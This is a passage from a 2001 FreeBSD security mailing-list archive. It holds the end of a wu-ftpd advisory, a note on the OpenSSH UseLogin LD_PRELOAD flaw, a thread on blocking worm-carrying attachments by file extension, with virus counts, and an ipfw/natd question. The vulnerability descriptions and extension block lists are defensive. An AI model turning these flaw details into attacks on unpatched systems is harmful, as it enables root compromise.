> FreeBSD" as such: it is part of the FreeBSD ports collection, which
> contains over 6000 third-party applications in a ready-to-install
> format. The ports collection shipped with FreeBSD 4.4 contains this
> problem since it was discovered after the release.
>
> FreeBSD makes no claim about the security of these third-party
> applications, although an effort is underway to provide a security
> audit of the most security-critical ports.
>
> III. Impact
>
> FTP users, including anonymous FTP users, can cause arbitrary commands
> to be executed as root on the local machine.
>
> If you have not chosen to install the wu-ftpd port/package, then your
> system is not vulnerable to this problem.
>
> IV.  Workaround
>
> Deinstall the wu-ftpd port/package, if you have installed it.
>
> V.   Solution
>
> One of the following:
>
> 1) Upgrade your entire ports collection and rebuild the wu-ftpd port.
>
> 2) Deinstall the old package and install a new package dated after the
> correction date, obtained from:
>
> [i386]
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/ftp/wu-ftpd-2.6.1_7.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/ftp/wu-ftpd-2.6.1_7.tgz
>
> [alpha]
> Packages are not automatically generated for the alpha architecture at
> this time due to lack of build resources
>
> NOTE: It may be several days before updated packages are available. Be
> sure to check the file creation date on the package, because the
> version number of the software has not changed.
>
> 3) download a new port skeleton for the wu-ftpd port from:
>
> http://www.freebsd.org/ports/
>
> and use it to rebuild the port.
>
> 4) Use the portcheckout utility to automate option (3) above. The
> portcheckout port is available in /usr/ports/devel/portcheckout or the
> package can be obtained from:
>
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
>
> VI.  Correction details
>
> The following list contains the revision numbers of each file that was
> corrected in the FreeBSD ports collection.
>
> Path                                                             Revision
> - -------------------------------------------------------------------------
> ports/ftp/wu-ftpd/Makefile                                         1.41
> ports/ftp/wu-ftpd/files/patch-ap                                   1.2
> - -------------------------------------------------------------------------
>
> VII. References
>
> <URL:http://www.securityfocus.com/archive/1/242750>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.6 (FreeBSD)
> Comment: For info see http://www.gnupg.org
>
> iQCVAwUBPA0CA1UuHi5z0oilAQENSQP9HaHiACNyiHZtV8ILnUZWb+D01qf0wTy2
> gbZJGfKL/JTP41KLR4EpUitF5SZ+3Zjm8Ebv8XXCjCFWgIBU1xhZaXgi2U9PRLlG
> XxHKzvpGnTuBj3uJiLs2UvAbQ9Jz5Wp02u6fJV75dcbnXTPLSGRvxJZwOb2FHxnE
> MBUlG+QDpPw=
> =sp+c
> -----END PGP SIGNATURE-----
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 17: 1:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web21109.mail.yahoo.com (web21109.mail.yahoo.com [216.136.227.111])
	by hub.freebsd.org (Postfix) with SMTP id 102A637B417
	for <security@freebsd.org>; Tue,  4 Dec 2001 17:01:19 -0800 (PST)
Message-ID: <20011205010118.50293.qmail@web21109.mail.yahoo.com>
Received: from [209.8.72.252] by web21109.mail.yahoo.com via HTTP; Tue, 04 Dec 2001 17:01:18 PST
Date: Tue, 4 Dec 2001 17:01:18 -0800 (PST)
From: Henry smith <getzz11@yahoo.com>
Subject: upgrade sshd ?
To: security@freebsd.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Right now, I'm using OpenSSH_3.0.1. Do I need to
upgrade to 3.0.2 ?


__________________________________________________
Do You Yahoo!?
Buy the perfect holiday gifts at Yahoo! Shopping.
http://shopping.yahoo.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 17:26:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from radix.cryptio.net (radix.cryptio.net [199.181.107.213])
	by hub.freebsd.org (Postfix) with ESMTP id E3B8337B41B
	for <security@FreeBSD.ORG>; Tue,  4 Dec 2001 17:26:10 -0800 (PST)
Received: (from emechler@localhost)
	by radix.cryptio.net (8.11.6/8.11.6) id fB51Q5c95565;
	Tue, 4 Dec 2001 17:26:05 -0800 (PST)
	(envelope-from emechler)
Date: Tue, 4 Dec 2001 17:26:05 -0800
From: Erick Mechler <emechler@techometer.net>
To: Henry smith <getzz11@yahoo.com>
Cc: security@FreeBSD.ORG
Subject: Re: upgrade sshd ?
Message-ID: <20011204172605.T66947@techometer.net>
References: <20011205010118.50293.qmail@web21109.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011205010118.50293.qmail@web21109.mail.yahoo.com>; from Henry smith on Tue, Dec 04, 2001 at 05:01:18PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Yeah, if you don't want to be vulnerable to the 'UseLogin' exploit.  The 
packages should have shown up on the mirrors by now.

--Erick

----------------------------------------

Important Changes:
==================

        This release fixes a vulnerability in the UseLogin option
        of OpenSSH.  This option is not enabled in the default
        installation of OpenSSH.

        However, if UseLogin is enabled by the administrator, all
        versions of OpenSSH prior to 3.0.2 may be vulnerable to
        local attacks.

        The vulnerability allows local users to pass environment
        variables (e.g. LD_PRELOAD) to the login process.  The login
        process is run with the same privilege as sshd (usually
        with root privilege).

        Do not enable UseLogin on your machines or disable UseLogin
        again in /etc/sshd_config:
                UseLogin no

----------------------------------------

At Tue, Dec 04, 2001 at 05:01:18PM -0800, Henry smith said this:
:: Right now, I'm using OpenSSH_3.0.1. Do I need to
:: upgrade to 3.0.2 ?
:: 
:: 
:: __________________________________________________
:: Do You Yahoo!?
:: Buy the perfect holiday gifts at Yahoo! Shopping.
:: http://shopping.yahoo.com
:: 
:: To Unsubscribe: send mail to majordomo@FreeBSD.org
:: with "unsubscribe freebsd-security" in the body of the message

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 17:32:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231])
	by hub.freebsd.org (Postfix) with ESMTP id 740C037B417
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 17:32:39 -0800 (PST)
To: freebsd-security@freebsd.org
Subject: One solution (Re: Mail list is posting gone virus!!!!)
Message-ID: <1007515952.3c0d7930e7a16@smg.borderware.com>
Date: Tue, 04 Dec 2001 20:32:32 -0500 (EST)
From: "Bruce M. Walker" <bmw@borderware.com>
References: <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz> <20011204161321.T92148@elvis.mu.org>
In-Reply-To: <20011204161321.T92148@elvis.mu.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=Any;q=1.0
Content-Transfer-Encoding: 7bit
User-Agent: BorderWare Technologies BorderPost (IMP/PHP 2.2.0)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Quoting Alfred Perlstein <bright@mu.org>:
>
> * Arjen De Landgraaf <arjen.de.landgraaf@cologic.co.nz> [011204 16:08]
> wrote:
> > 
> > Not a good advertisement for freebsd security.
>
> It's a microsoft virus, every list has it's bunch of Lusers
> subscribed. :)

While this isn't a "freebsd security" issue *specifically*, nowadays it's 
every admin's job to deal with bogus incoming mail, just like bogus incoming 
packets.


> > We have already received 3 copies of the gone virus through your
> list.
> 
> The list is not moderated.

It doesn't need to be to solve this problem.

May I refer you to: DEMIME  http://scifi.squawk.com/demime.html
which can easily be added to majordomo thus eliminating several problems at 
once: useless attachments stripped (including viruses, v-cards and Microsoft 
formatting crud), HTML mail turned into plain text, much bandwidth wastage 
eliminated.

Other lists use this or a similar tool; eg: one or two of the openbsd lists.  
Very effective!

-bmw

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 17:35:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mgw1.MEIway.com (mgw1.meiway.com [212.73.210.75])
	by hub.freebsd.org (Postfix) with ESMTP id 62B1537B41B
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 17:35:31 -0800 (PST)
Received: from mail.Go2France.com (ms1.meiway.com [212.73.210.73])
	by mgw1.MEIway.com (Postfix Relay Hub) with ESMTP id 833FE16B1C
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 02:35:29 +0100 (CET)
Received: from IBM-HIRXKN66F0W.Go2France.com [66.64.14.18] by mail.Go2France.com with ESMTP
  (SMTPD32-6.06) id AD3237350274; Wed, 05 Dec 2001 02:49:38 +0100
Message-Id: <5.1.0.14.2.20011204193019.05f01c18@mail.Go2France.com>
X-Sender: LConrad@Go2France.com@mail.Go2France.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 04 Dec 2001 19:34:31 -0600
To: freebsd-security@freebsd.org
From: Len Conrad <LConrad@Go2France.com>
Subject: Re: Mail list is posting gone virus!!!!
In-Reply-To: <4.3.2.7.2.20011204172959.04d112e0@localhost>
References: <01d701c17d10$a8b334b0$0001300a@lhtech.lhtek.com>
 <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


>Also no excuse. Our heuristic checker caught the very first copy
>(See http://www.brettglass.com/spam/paper.html) and would run
>just fine on the FreeBSD mail servers.

the freebsd hubs run postfix, afaik, which can block on single and double 
file extensions, like .scr, .doc.scr.  Our FreeBSD AV box sees no BadTrans 
or  Goner because the postfix front-ends reject them as attachments.

For volumes, here's FreeBSD + Kaspersky for Tue through first 20 hours:

Grand Totals
------------
messages

  352086   received
  386330   delivered
       5   forwarded
       1   deferred  (1  deferrals)
   16844   bounced
      47   rejected

    6288m  bytes received
    7786m  bytes delivered
   63730   senders
   10594   sending hosts/domains
   45609   recipients
    6828   recipient hosts/domains

giving:

       1 Infected with I-Worm.Magistr.b.poly
       1 Infected with Macro.Word97.Sattelite.b
       1 Infected with from=bounce-members-68677@lists.naela.org
       1 Infected with from=info@kalistaderm.com
       1 Infected with from=bounce-members-67997@lists.naela.org
       1 Infected with Macro.Word97.Ethan
       1 Infected with I-Worm.Hybris.f
       1 Infected with I-Worm.Hybris.c
       3 Infected with I-Worm.Magistr.a.poly
       3 Infected with I-Worm.KakWorm
       3 Infected with from=emailtesting@gfi.com
       6 Infected with I-Worm.Badtrans
       7 Infected with Win32.FunLove.4070
       8 Infected with I-Worm.MTX
      34 Infected with I-Worm.Hybris.b
      99 Infected with I-Worm.Magistr.a
     101 Infected with I-Worm.Magistr.b
     281 Infected with I-Worm.BadtransII
     522 Infected with I-Worm.Sircam.c
     582 Infected with I-Worm.Goner

    1657 TOTAL

Len


http://MenAndMice.com/DNS-training
http://BIND8NT.MEIway.com : ISC BIND 8.2.4 for NT4 & W2K
http://IMGate.MEIway.com  : Build free, hi-perf, anti-abuse mail gateways


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 17:44:38 2001
Delivered-To: freebsd-security@freebsd.org
Received: from elvis.mu.org (elvis.mu.org [216.33.66.196])
	by hub.freebsd.org (Postfix) with ESMTP
	id 64F1037B419; Tue,  4 Dec 2001 17:44:32 -0800 (PST)
Received: by elvis.mu.org (Postfix, from userid 1192)
	id 086AE81D01; Tue,  4 Dec 2001 19:44:32 -0600 (CST)
Date: Tue, 4 Dec 2001 19:44:32 -0600
From: Alfred Perlstein <bright@mu.org>
To: Len Conrad <LConrad@Go2France.com>
Cc: freebsd-security@freebsd.org, jmb@freebsd.org
Subject: block double suffix attachments? Re: Mail list is posting gone virus!!!!
Message-ID: <20011204194431.E92148@elvis.mu.org>
References: <01d701c17d10$a8b334b0$0001300a@lhtech.lhtek.com> <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz> <4.3.2.7.2.20011204172959.04d112e0@localhost> <5.1.0.14.2.20011204193019.05f01c18@mail.Go2France.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <5.1.0.14.2.20011204193019.05f01c18@mail.Go2France.com>; from LConrad@Go2France.com on Tue, Dec 04, 2001 at 07:34:31PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

* Len Conrad <LConrad@Go2France.com> [011204 19:35] wrote:
> 
> >Also no excuse. Our heuristic checker caught the very first copy
> >(See http://www.brettglass.com/spam/paper.html) and would run
> >just fine on the FreeBSD mail servers.
> 
> the freebsd hubs run postfix, afaik, which can block on single and double 
> file extensions, like .scr, .doc.scr.  Our FreeBSD AV box sees no BadTrans 
> or  Goner because the postfix front-ends reject them as attachments.
> 
> For volumes, here's FreeBSD + Kaspersky for Tue through first 20 hours:

yipes!

Blocking double extentions is a real pain because people may elect
to send .gz or .bz2 or a myriad of other legit formats.  I guess in
the face of this obnoxious plague it may make sense to drop all
attachments that contain double suffix attachments with the exception
of .gz and .bz2.  I know I've most likely forgotten an important
extention, but we can add those as the need arises?

Jonathan, would that be possible? (block all messages with attachments
that have and double suffix? except .gz/.bz2 ?)

> 
> Grand Totals
> ------------
> messages
> 
>   352086   received
>   386330   delivered
>        5   forwarded
>        1   deferred  (1  deferrals)
>    16844   bounced
>       47   rejected
> 
>     6288m  bytes received
>     7786m  bytes delivered
>    63730   senders
>    10594   sending hosts/domains
>    45609   recipients
>     6828   recipient hosts/domains
> 
> giving:
> 
>        1 Infected with I-Worm.Magistr.b.poly
>        1 Infected with Macro.Word97.Sattelite.b
>        1 Infected with from=bounce-members-68677@lists.naela.org
>        1 Infected with from=info@kalistaderm.com
>        1 Infected with from=bounce-members-67997@lists.naela.org
>        1 Infected with Macro.Word97.Ethan
>        1 Infected with I-Worm.Hybris.f
>        1 Infected with I-Worm.Hybris.c
>        3 Infected with I-Worm.Magistr.a.poly
>        3 Infected with I-Worm.KakWorm
>        3 Infected with from=emailtesting@gfi.com
>        6 Infected with I-Worm.Badtrans
>        7 Infected with Win32.FunLove.4070
>        8 Infected with I-Worm.MTX
>       34 Infected with I-Worm.Hybris.b
>       99 Infected with I-Worm.Magistr.a
>      101 Infected with I-Worm.Magistr.b
>      281 Infected with I-Worm.BadtransII
>      522 Infected with I-Worm.Sircam.c
>      582 Infected with I-Worm.Goner
> 
>     1657 TOTAL
> 
> Len
> 
> 
> http://MenAndMice.com/DNS-training
> http://BIND8NT.MEIway.com : ISC BIND 8.2.4 for NT4 & W2K
> http://IMGate.MEIway.com  : Build free, hi-perf, anti-abuse mail gateways
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

-- 
-Alfred Perlstein [alfred@freebsd.org]
'Instead of asking why a piece of software is using "1970s technology,"
 start asking why software is ignoring 30 years of accumulated wisdom.'
                           http://www.morons.org/rants/gpl-harmful.php3

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 18:17: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from c007.snv.cp.net (c007-h000.c007.snv.cp.net [209.228.33.206])
	by hub.freebsd.org (Postfix) with SMTP id 0FAE237B417
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 18:16:56 -0800 (PST)
Received: (cpmta 12300 invoked from network); 4 Dec 2001 18:16:55 -0800
Received: from 64.195.103.89 (HELO boethius.telocity.com)
  by smtp.telocity.com (209.228.33.206) with SMTP; 4 Dec 2001 18:16:55 -0800
X-Sent: 5 Dec 2001 02:16:55 GMT
Received: by boethius.telocity.com (Postfix, from userid 1000)
	id BD4CD22CE; Tue,  4 Dec 2001 20:16:54 -0600 (CST)
Date: Tue, 4 Dec 2001 20:16:54 -0600
From: Anthony Kim <niceshorts@yahoo.com>
To: Alfred Perlstein <bright@mu.org>
Cc: Len Conrad <LConrad@Go2France.com>, freebsd-security@freebsd.org,
	jmb@freebsd.org
Subject: Re: block double suffix attachments? Re: Mail list is posting gone virus!!!!
Message-ID: <20011205021654.GA31554@boethius.telocity.com>
Mail-Followup-To: Alfred Perlstein <bright@mu.org>,
	Len Conrad <LConrad@Go2France.com>, freebsd-security@freebsd.org,
	jmb@freebsd.org
References: <01d701c17d10$a8b334b0$0001300a@lhtech.lhtek.com> <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz> <4.3.2.7.2.20011204172959.04d112e0@localhost> <5.1.0.14.2.20011204193019.05f01c18@mail.Go2France.com> <20011204194431.E92148@elvis.mu.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20011204194431.E92148@elvis.mu.org>
User-Agent: Mutt/1.3.23.2i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Tue, Dec 04, 2001, Alfred Perlstein wrote:

> Blocking double extentions is a real pain because people may
> elect to send .gz or .bz2 or a myriad of other legit formats.
> I guess in the face of this obnoxious plague it may make sense
> to drop all attachments that contain double suffix attachments
> with the exception of .gz and .bz2.  I know I've most likely
> forgotten an important extention, but we can add those as the
> need arises?

and .Z

You've got to consider, people send all sorts of weird filenames.
mtr.c.patch or ncurses.ru.uu or bill_me.c.diff or
BSD.include.dist - you get the idea.

At work we focus on the AV recommended most wanted, .pif, .exe.,
.vbs, .scr, .shs, but this list is getting longer and longer :(
-- 
"Le motd juste."

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 18:20:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from c007.snv.cp.net (c007-h000.c007.snv.cp.net [209.228.33.206])
	by hub.freebsd.org (Postfix) with SMTP id E49DA37B417
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 18:20:23 -0800 (PST)
Received: (cpmta 16913 invoked from network); 4 Dec 2001 18:20:23 -0800
Received: from 64.195.103.89 (HELO boethius.telocity.com)
  by smtp.telocity.com (209.228.33.206) with SMTP; 4 Dec 2001 18:20:23 -0800
X-Sent: 5 Dec 2001 02:20:23 GMT
Received: by boethius.telocity.com (Postfix, from userid 1000)
	id DF0E822CE; Tue,  4 Dec 2001 20:20:22 -0600 (CST)
Date: Tue, 4 Dec 2001 20:20:22 -0600
From: Anthony Kim <niceshorts@yahoo.com>
To: "Bruce M. Walker" <bmw@borderware.com>
Cc: freebsd-security@freebsd.org
Subject: Re: One solution (Re: Mail list is posting gone virus!!!!)
Message-ID: <20011205022022.GB31554@boethius.telocity.com>
Mail-Followup-To: "Bruce M. Walker" <bmw@borderware.com>,
	freebsd-security@freebsd.org
References: <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz> <20011204161321.T92148@elvis.mu.org> <1007515952.3c0d7930e7a16@smg.borderware.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1007515952.3c0d7930e7a16@smg.borderware.com>
User-Agent: Mutt/1.3.23.2i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Tue, Dec 04, 2001, Bruce M. Walker wrote:
> 
> May I refer you to: DEMIME  http://scifi.squawk.com/demime.html
> which can easily be added to majordomo thus eliminating several
> problems at once: useless attachments stripped (including
> viruses, v-cards and Microsoft formatting crud), HTML mail
> turned into plain text, much bandwidth wastage eliminated.
> 
> Other lists use this or a similar tool; eg: one or two of the
> openbsd lists.  Very effective!

You're right. It is very effective. But it also eliminates
mime-encapsulated pgp signatures and I know a lot of people send
attachments by way of patches and such. It would prove to be an
interesting sociological experiment to watch however.

-- 
"Le motd juste."

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 18:20:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from elvis.mu.org (elvis.mu.org [216.33.66.196])
	by hub.freebsd.org (Postfix) with ESMTP
	id C3AA737B417; Tue,  4 Dec 2001 18:20:34 -0800 (PST)
Received: by elvis.mu.org (Postfix, from userid 1192)
	id 49FD081D01; Tue,  4 Dec 2001 20:20:29 -0600 (CST)
Date: Tue, 4 Dec 2001 20:20:29 -0600
From: Alfred Perlstein <bright@mu.org>
To: Len Conrad <LConrad@Go2France.com>, freebsd-security@freebsd.org,
	jmb@freebsd.org
Subject: Re: block double suffix attachments? Re: Mail list is posting gone virus!!!!
Message-ID: <20011204202029.F92148@elvis.mu.org>
References: <01d701c17d10$a8b334b0$0001300a@lhtech.lhtek.com> <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz> <4.3.2.7.2.20011204172959.04d112e0@localhost> <5.1.0.14.2.20011204193019.05f01c18@mail.Go2France.com> <20011204194431.E92148@elvis.mu.org> <20011205021654.GA31554@boethius.telocity.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011205021654.GA31554@boethius.telocity.com>; from niceshorts@yahoo.com on Tue, Dec 04, 2001 at 08:16:54PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

* Anthony Kim <niceshorts@yahoo.com> [011204 20:16] wrote:
> On Tue, Dec 04, 2001, Alfred Perlstein wrote:
> 
> > Blocking double extentions is a real pain because people may
> > elect to send .gz or .bz2 or a myriad of other legit formats.
> > I guess in the face of this obnoxious plague it may make sense
> > to drop all attachments that contain double suffix attachments
> > with the exception of .gz and .bz2.  I know I've most likely
> > forgotten an important extention, but we can add those as the
> > need arises?
> 
> and .Z
> 
> You've got to consider, people send all sorts of weird filenames.
> mtr.c.patch or ncurses.ru.uu or bill_me.c.diff or
> BSD.include.dist - you get the idea.
> 
> At work we focus on the AV recommended most wanted, .pif, .exe.,
> .vbs, .scr, .shs, but this list is getting longer and longer :(

It's always better to have a:

permit: .uu .bz2 .gz .Z
deny: *

than the opposite, if someone complains then we'll let them
through, part of the reason that all these problems occur is
that there's so many goddamn formats that exist for microsofty
clients that will screw them over that people forget to block
them all.


-- 
-Alfred Perlstein [alfred@freebsd.org]
'Instead of asking why a piece of software is using "1970s technology,"
 start asking why software is ignoring 30 years of accumulated wisdom.'
                           http://www.morons.org/rants/gpl-harmful.php3

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 18:29:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from VL7.net (OL51-141.fibertel.com.ar [24.232.141.51])
	by hub.freebsd.org (Postfix) with ESMTP id 6F58737B417
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 18:29:00 -0800 (PST)
Received: from localhost (fox@localhost)
	by VL7.net (8.11.6/8.11.6) with ESMTP id fB52SCp51160
	for <freebsd-security@FreeBSD.ORG>; Tue, 4 Dec 2001 23:28:13 -0300 (ART)
	(envelope-from fox@vl7.net)
Date: Tue, 4 Dec 2001 23:28:12 -0300 (ART)
From: Vladimir Pianykh <fox@vl7.net>
To: freebsd-security@FreeBSD.ORG
Subject: ipfw
In-Reply-To: <4.3.2.7.2.20011204172959.04d112e0@localhost>
Message-ID: <20011204232236.L51132-100000@VL7.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi!

I tried to make port forwarding to server in internal network, and nat for
users in same network. Just port forwarding is working fine, but if I
enable masquarad for internal network, I'm losing connection to redirected
servers.

What is wrong in my script?

Thank you.

out=192.168.2.1
ext_i=ep0
int_serv_1=192.168.1.1
port_1=80
int_serv_2=192.168.1.2
port_2=25

########################## forwarding ###############################

ipfw add 1000 divert 8888 tcp from any to $out $port_1 via $ext_i
ipfw add 1100 divert 8888 ip from $int_serv_1 to any via $ext_i
natd -p 8888 -n $ext_i -redirect_port tcp $int_serv_1:$port_1 $port_1

#--------------------------------------------------------------------

ipfw add 1500 divert 8889 tcp from any to $out $port_2 via $ext_i
ipfw add 1600 divert 8889 ip from $int_serv_2 to any via $ext_i
natd -p 8889 -n $ext_i -redirect_port tcp $int_serv_2:$port_2 $port_2

############################ NAT ####################################

ipfw add 0900 divert 8887 ip from any to any via $ext_i
natd -p 8887 -n $ext_i

ipfw add 65000 allow ip from any to any


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 18:41:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pirahna.awe-full.com (s64-180-126-6.bc.hsia.telus.net [64.180.126.6])
	by hub.freebsd.org (Postfix) with ESMTP id 11D0837B417
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 18:41:49 -0800 (PST)
Received: from uniserve.com (pirahna@localhost [127.0.0.1])
	by pirahna.awe-full.com (8.11.6/8.11.6) with ESMTP id fB52fU350675;
	Tue, 4 Dec 2001 18:41:30 -0800 (PST)
	(envelope-from landons@uniserve.com)
Message-ID: <3C0D8959.5080500@uniserve.com>
Date: Tue, 04 Dec 2001 18:41:29 -0800
From: Landon Stewart <landons@uniserve.com>
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:0.9.6) Gecko/20011125
X-Accept-Language: en-us
MIME-Version: 1.0
To: Anthony Kim <niceshorts@yahoo.com>
Cc: freebsd-security@freebsd.org
Subject: Re: block double suffix attachments? Re: Mail list is posting gone virus!!!!
